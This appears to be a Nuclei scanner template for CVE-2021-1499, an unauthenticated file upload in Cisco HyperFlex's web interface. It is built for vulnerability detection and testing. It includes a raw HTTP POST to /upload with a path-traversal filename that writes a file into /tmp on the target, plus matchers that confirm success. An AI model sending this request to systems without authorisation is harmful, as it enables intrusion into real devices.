68 lines
2.5 KiB
YAML
68 lines
2.5 KiB
YAML
id: CVE-2021-1499
|
|
|
|
info:
|
|
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
|
|
author: gy741
|
|
severity: medium
|
|
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
|
|
impact: |
|
|
Allows an attacker to upload and execute arbitrary files on the target system
|
|
remediation: |
|
|
Apply the necessary security patches or updates provided by Cisco
|
|
reference:
|
|
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
|
|
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
|
|
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
|
|
- https://github.com/Z0fhack/Goby_POC
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-1499
|
|
cwe-id: CWE-306
|
|
epss-score: 0.96279
|
|
epss-percentile: 0.99533
|
|
cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cisco
|
|
product: hyperflex_hx220c_af_m5
|
|
tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /upload HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}
|
|
|
|
-----------------------------253855577425106594691130420583
|
|
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
|
|
Content-Type: application/json
|
|
|
|
MyPasswdNewData->/api/tomcat
|
|
|
|
-----------------------------253855577425106594691130420583--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{"result":'
|
|
- '"filename:'
|
|
- '/tmp/passwd9'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950 |